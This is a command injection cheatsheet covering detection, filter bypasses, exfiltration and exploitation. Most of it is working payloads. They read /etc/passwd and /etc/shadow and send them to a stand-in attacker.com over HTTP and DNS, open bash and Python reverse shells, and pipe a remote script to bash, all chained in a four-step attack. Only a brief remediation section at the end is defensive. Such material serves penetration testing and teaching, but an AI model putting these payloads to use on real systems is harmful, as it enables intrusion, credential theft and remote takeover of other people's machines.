Command Injection Cheatsheet

Command injection occurs when user input is passed unsanitized to a system shell. Unlike code injection, you’re executing OS commands directly. This cheatsheet covers detection through full exploitation with every bypass technique.

Detection

Basic injectors

Test all of these in every parameter:

; id
| id
|| id
& id
&& id
` id `
$(id)
\n id
%0a id

; ping -c 5 127.0.0.1
| ping -n 5 127.0.0.1
& ping -c 5 attacker.com

A 5-second delay = 5 ICMP packets = code execution confirmed.

; nslookup attacker.com
; curl http://attacker.com/`id`
; wget http://attacker.com/?c=$(id|base64)
$(dig +short attacker.com)

Use interactsh or Burp Collaborator.

OS Command Chaining

Operator	Behavior	Works on
`;`	Run A then B regardless	Unix
`\|`	Pipe stdout of A to B	Both
`\|\|`	Run B only if A fails	Both
`&`	Run A and B concurrently	Both
`&&`	Run B only if A succeeds	Both
`\n` / `%0a`	Newline as command separator	Unix
`cmd`	Command substitution	Unix
`$(cmd)`	Command substitution	Unix
`\r\n` / `%0d%0a`	CRLF injection	Windows cmd

Windows-Specific

; whoami
& whoami
| whoami
%26 whoami          # URL-encoded &
^& whoami           # escaped
cmd /c whoami
powershell -c whoami
powershell.exe -NoP -NonI -Exec Bypass -c "whoami"

Windows environment variables in commands

%COMSPEC% /c whoami
%SystemRoot%\system32\cmd.exe /c whoami

Filter Bypass Techniques

Bypassing space filters

# Use ${IFS}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd

# Use tab
cat\t/etc/passwd      (URL: cat%09/etc/passwd)

# Use brace expansion
{cat,/etc/passwd}

# Use redirects
cat</etc/passwd

Bypassing keyword filters

# Split the command with variables
a=ca;b=t;$a$b /etc/passwd
a=id;$a

# Use wildcards
/bin/c?t /etc/passwd
/bin/ca* /etc/passwd
/???/??t /etc/passwd

# Use base64
echo "aWQ=" | base64 -d | bash
$(echo "aWQ=" | base64 -d)

# Reverse the string
echo "tac" | rev | xargs    # runs "cat" (not useful but shows technique)

# Hex encoding
$(printf '\x69\x64')       # hex for 'id'

Bypassing blacklisted characters

# Quotes to break string detection
'id'
"id"
i""d
i''d

# $() nesting
$($(echo id))

# Unicode lookalikes (rare but possible)
ｉｄ   # fullwidth characters

Exfiltration Techniques

HTTP exfiltration

curl http://attacker.com/$(id|base64 -w0)
wget "http://attacker.com/?data=$(cat /etc/passwd | base64 -w0)"
fetch http://attacker.com/?d=$(id)   # BSD systems

DNS exfiltration

# Split long output across DNS labels
for i in $(cat /etc/passwd | base64 -w 30); do
  nslookup $i.attacker.com;
done

# One-liner
nslookup $(cat /etc/shadow | base64 | head -c 50).attacker.com

File write (reverse shell)

; echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" > /tmp/r.sh && bash /tmp/r.sh
; curl http://attacker.com/shell.sh | bash
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh"])'

Context-Specific Injection

In ping/nslookup wrappers

127.0.0.1; id
127.0.0.1 | id
127.0.0.1`id`

In email fields

test@email.com; id
"test@email.com"; id
test+$(id)@email.com

In filename processing (ImageMagick, ffmpeg, etc.)

file.jpg; id #
file.jpg | id

In curl/wget URL parameters

http://attacker.com/`id`
http://attacker.com/$(id)

# Step 1: Confirm RCE via DNS (no output)
; nslookup $(id | base64).attacker.com

# Step 2: Exfil /etc/passwd via HTTP
; curl http://attacker.com/?f=$(cat /etc/passwd | base64 -w0)

# Step 3: Write reverse shell
; echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" | bash

# Step 4: Catch on attacker
nc -lvnp 4444

Remediation

Never pass user input to shell execution functions (system(), exec(), popen(), subprocess.call(shell=True)).
Use parameterized system calls — subprocess.run(["ping", host]) instead of subprocess.run(f"ping {host}", shell=True).
Validate input strictly against a whitelist of allowed characters.
Run the application with least privilege — limit what a successful injection can do.